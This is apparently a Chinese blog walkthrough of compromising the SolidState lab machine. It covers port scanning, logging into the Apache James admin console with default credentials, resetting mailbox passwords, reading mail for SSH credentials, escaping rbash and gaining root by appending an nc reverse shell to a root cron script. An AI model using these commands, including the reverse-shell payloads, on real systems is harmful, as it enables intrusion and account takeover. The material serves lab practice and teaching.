首页 > 其他分享 >渗透之SolidState靶机

渗透之SolidState靶机

时间:2024-12-22 23:29:23浏览次数:7  
标签:渗透 tcp SolidState 192.168 靶机 open 56.137 邮件 user

目录

1、信息收集

1.1 namp 扫描

1. 扫描端口

2. 端口详细信息

3. 脚本扫描

1.2 nikto

1.3 gobuster

2、信息整合

2.1、端口服务

2.2、页面

3、渗透

3.1 获取 shell

1. JAMES 漏洞

2. 尝试默认密码

3. 修改邮箱用户密码

4. 查看用户邮件

5. 进入 ssh

6. 逃逸 rbash 获取到正常的 shell

3.2 提权

1. 查看系统信息

2. 使用 find 查找有权限的文件

3. 查看文件信息

4. 利用 python 脚本提权

5. 获取 root 权限

6. 查看定时任务

总结

查看JAMES 组件漏洞

邮件服务器James命令解释

使用 telnet 登录 pop3


1、信息收集

nmap 扫描主机 ip:192.168.56.137

1.1 namp 扫描

1. 扫描端口
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
2. 端口详细信息
# Nmap 7.92 scan initiated Sun Dec 15 03:36:34 2024 as: nmap -sT -sV -sC -O -o check/portinfo 192.168.56.137 192.168.56.137
Nmap scan report for 192.168.56.137
Host is up (0.14s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.56.128 [192.168.56.128]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
MAC Address: 00:0C:29:5D:1C:C5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 15 03:37:20 2024 -- 2 IP addresses (2 hosts up) scanned in 45.52 seconds
3. 脚本扫描
# Nmap 7.92 scan initiated Sun Dec 15 03:39:30 2024 as: nmap --script=vuln -p22,25,80,110,119,4555 -o check/137script 192.168.56.137
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.137
Host is up (0.00027s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.137
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.137:80/
|     Form id: name
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
MAC Address: 00:0C:29:5D:1C:C5 (VMware)

# Nmap done at Sun Dec 15 03:40:25 2024 -- 1 IP address (1 host up) scanned in 55.03 seconds

1.2 nikto

└─$ nikto -host 192.168.56.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.137
+ Target Hostname:    192.168.56.137
+ Target Port:        80
+ Start Time:         2024-12-15 03:59:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5575af6de9eb2, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2024-12-15 03:59:50 (GMT-5) (13 seconds)

1.3 gobuster

/images               (Status: 301) [Size: 317] [--> http://192.168.56.137/images/]
/.html                (Status: 403) [Size: 294]
/about.html           (Status: 200) [Size: 7182]
/index.html           (Status: 200) [Size: 7776]
/services.html        (Status: 200) [Size: 8404]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.137/assets/]
/README.txt           (Status: 200) [Size: 963]
/LICENSE.txt          (Status: 200) [Size: 17128]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
http://192.168.56.137/icons/README

2、信息整合

2.1、端口服务

22/tcp   open  ssh
25/tcp   open  smtp
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
110/tcp open  pop3    JAMES pop3d 2.3.2

Linux 3.X|4.X

2.2、页面

通过目录扫描没有发现太多有效的信息,包括 80 网页都是几个基础网页

/about.html

/index.html

/services.html

3、渗透

3.1 获取 shell

1. JAMES 漏洞

由于 80 端口的 web 页面没有发现有啥可利用信息,这里看 110 端口的 pop3 服务,通过 nmap 可以看到运行的是JAMES pop3d 2.3.2 服务

Apache James简介:
   Apache James(Java Apache Mail EnterpriseServer)是Apache组织的子项目之一,完全采用纯Java技术开发,实现了SMTP、POP3与NNTP等多种邮件相关协议。James是一个邮件应用平台,可以通过Mailet扩充其功能,如Mail2SMS、Mail2Fax等。James提供了比较完善的配置方案,尤其是关于邮件内容存储和用户信息存储部分,可以选择在文件、数据库或其他介质中保存。

这里搜索 james 默认账号密码,默认密码为:root/root

2. 尝试默认密码

使用 nc 尝试登录,发现可以直接使用默认密码登录,并且可以查看到这里有 5 个用户

nc 192.168.56.137 4445
root
root

3. 修改邮箱用户密码

由于我们是使用的 root 账号登录的,这里可以直接把这些用户的密码修改

setpassword james 123456
setpassword thomas 123456
setpassword john 123456
setpassword mindy 123456
setpassword mailadmin 123456

4. 查看用户邮件

使用 telnet 可以登录到 pop3 服务内,使用我们修改的密码可以登录每个账号并查看每个邮件的内容

这里使用 john 账号的登录发现里面有一个让别人帮忙修改 mindy 密码的邮件,发送人是 james

同时我们进入 james 账号内可以发现第 2 个邮件有修改的密码信息

telnet 192.168.56.137 110
user john
pass 123456  

list     # 列举邮件和邮件大小
retr 1   # 查看邮件内容

# 获取的账号密码
username: mindy
pass: P@55W0rd1!2@

5. 进入 ssh

获取到 mindy 的密码后,由于邮件有提示,是系统密码,我们可以尝试登录,发现可以直接登录进入

6. 逃逸 rbash 获取到正常的 shell

rbash逃逸大全 - 先知社区

这里进入 ssh 后发现有很多命令都被限制,这里可以参考先知社区这个 rbash 逃逸的帖子,我们用 python -v 可以看到是有 python 的环境,可以使用这个命令进行逃逸,可以看到 cd 命令已经可以正常执行了

ssh mindy@192.168.56.137  "export TERM=xterm;python -c  'import pty;pty.spawn(\"/bin/bash\")'”

3.2 提权

1. 查看系统信息
uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

这里可以查看下 Debian 的 EXP,看下是否有可以利用的,但是这里是找到系统有个有读写执行的 py 文件,通过这个文件进行的提权

2. 使用 find 查找有权限的文件

使用 find 命令查询文件的时候,发现/opt/tmp.py 文件可以读写和执行,且权限是 root 的

find / -perm 777 -type f 2>/dev/null

3. 查看文件信息

查看文件信息,发现是清除 tmp 目录文件的一个脚本,猜测是定时脚本,因此我们可以写入打开 shell 的脚本,来反弹 shell

4. 利用 python 脚本提权

这里直接写入脚本覆盖,或者在后面追加我们自己的脚本

# 直接覆盖写入
echo 'import os; os.system("/bin/nc 192.168.56.128 6666 -e /bin/bash")' > /opt/tmp.py

# 再后面追加
echo "os.system('/bin/nc -e /bin/bash 192.168.56.128 6666')" >> /opt/tmp.py
5. 获取 root 权限

等待一段时间后,可以看到我们的监听有了响应,获取到了 root 权限

6. 查看定时任务

查看定时任务发现,确实是 root 权限运行的一个定时任务,每 3 分钟执行一次

4、总结

在 80 端口没有发现有用信息后,我们要尝试看下其他端口的服务,是否有可利用漏洞,进而进行渗透,这里碰到有一个 rbash 限制,很多命令无法执行,需要绕过才行,可以看下是否有有用的文件可以用来提权,例如使用 root 权限运行的定时任务脚本等

查看JAMES 组件漏洞

使用searchsploit查找该组件相关的漏洞,可以看到有两个命令远程命令执行漏洞,这两个漏洞也可以用来利用获取正常权限的 shell,尝试使用了 35513 这个 EXP,依旧需要我们查看邮件信息,然后找到 mindy 账号进行登录才行

searchsploit JAMES

邮件服务器James命令解释

nc ip port
# 使用nc连接服务,端口一般默认是4555

help display this help 显示帮助信息
listusers display existing accounts 显示现有账户
countusers display the number of existing accounts 显示现有账户数量
adduser [username] [password] add a new user 添加一个新用户
verify [username] verify if specified user exist 核实指定用户是否存在
deluser [username] delete existing user 删除存在的用户
setpassword [username] [password] sets a user's password 设置用户密码
setalias [user] [alias] locally forwards all email for 'user' to 'alias' 设置邮箱别名
showalias [username] shows a user's current email alias 显示别名
unsetalias [user] unsets an alias for 'user' 删除用户别名
setforwarding [username] [emailaddress] forwards a user's email to another email address 转发用户的电子邮件地址到另一个电子邮件地址
showforwarding [username] shows a user's current email forwarding 显示用户的当前邮件转发
unsetforwarding [username] removes a forward 删除转发
user [repositoryname] change to another user repository 改变另一个用户库
shutdown kills the current JVM (convenient when James is run as a daemon)关闭当前的服务
quit close connection 关闭连接

使用 telnet 登录 pop3

使用telnet命令连接到POP3服务器,命令格式如下:

telnet pop3.example.com 110

# 输入账号,格式如下
user your_username
# 输入密码,格式如下:
pass your_password


如果登录成功,服务器会返回一个状态提示,你可以开始使用POP3命令来管理你的邮件。
POP3命令的基本列表如下1:
stat:请求服务器回送邮箱统计资料,如邮件数、邮件总字节数等1。
list:返回指定邮件的大小等信息1。
retr:返回邮件的全部文本内容1。
dele:标记邮件为删除1。
rset:撤消所有的dele命令1。
top:返回指定邮件的前N行内容1。
noop:服务器返回一个肯定的响应1。
quit:结束与POP3服务器的会话

标签:渗透,tcp,SolidState,192.168,靶机,open,56.137,邮件,user
From: https://blog.csdn.net/lga0325/article/details/144654766

相关文章

  • 文件包含tomato靶机通关
    连接到靶机将网址放到dirb中扫描一下得到了三个目录我们挨个访问一下第一个是主目录第二个是主页面第三个报错我们在主目录页面继续访问发现了info.php打开发现存在文件包含我们查看页面源代码现存在文件包含的参数是image我们通过读取/etc/passwd来......
  • 文件包含漏洞(hackme和tomato靶机实战)
    hackme靶机1.扫描靶机IP靶机搭好后扫描我们靶机的IPnmap-O192.168.187.128/24扫描到靶机的IP后去访问他2.信息收集挨个访问后有文件上传的路径;uploads网站登录界面;login.php3.寻找薄弱点网页首页是个登录界面,注册个账号登录看看登录后的界面判断是......
  • #渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based S
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。目录一、基于时间延迟的SQL注入概述(一)原理(二)应用场景示......
  • 渗透测试-前后端加密分析之AES加密下的SQL注入
    本文是高级前端加解密与验签实战的第9篇文章,也是最后一篇文章。本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过前后端加密进行SQL注入。登录输入账号密码,抓包查看数据包,看上去就是一个普通的aes加密:这里热加载代码不算太难,常规的加解密函数就可以了:encryp......
  • DC-1靶场渗透过程详解
    主机发现与端口扫描打开DC-1,确认与主机在同一网段,查看mac地址查看DC-1靶机ip地址sudoarp-scan-l  扫描具体端口信息sudonmap-A-p--sS-sC-T4192.168.100.129端口信息22/tcpopensshOpenSSH6.0p1Debian4+deb7u7(protocol2.0)80/tcpopenhttpApache......
  • 渗透测试-前后端加密分析之RSA+AES
    本文是高级前端加解密与验签实战的第8篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过RSA与AES加密来爆破登录。由于RSA加解密有长度限制,以及解密速度等问题,所以如https等协议都是用非对称加密对称加密的密钥,然后用对称加密算法来加密数据。本关卡就是用RS......
  • web渗透流程与思路
    1、目录爆破web渗透第一件事肯定就是目录爆破,首先它可以让你了解网站的大概结构,从而去寻找攻击面,尤其是一些功能性的网页,例如login、admin等,其次可能会爆破出网站没有公开展示的敏感网页或者信息。下面的项目里包含有各种敏感文件或目录的爆破字典。https://github.com/carlo......
  • Tomato 靶机(通关攻略)
    点击开启靶机去kali终端输入arp-scan-l//扫描靶机IP扫出靶机IP192.168.131.171第一步:信息收集端口扫描nmap-p-192.168.131.171敏感目录扫描dirbhttp://192.168.131.171总结:IP:192.168.168.131开放端口:21、80、2211、8888敏感目录:http://192.168.168.1......
  • 渗透测试-前端加密分析之RSA加密登录(密钥来源服务器)
    本文是高级前端加解密与验签实战的第6篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过RSA加密来爆破登录。分析这里的代码跟上文的类似,但是加密的公钥是通过请求服务端获取的http://127.0.0.1:8787/crypto/js/rsa/generator由于密钥是服务端生......
  • 【2024寒假全新】渗透测试工具大全(超详细),收藏这一篇就够了!
     黑客/网安大礼包:......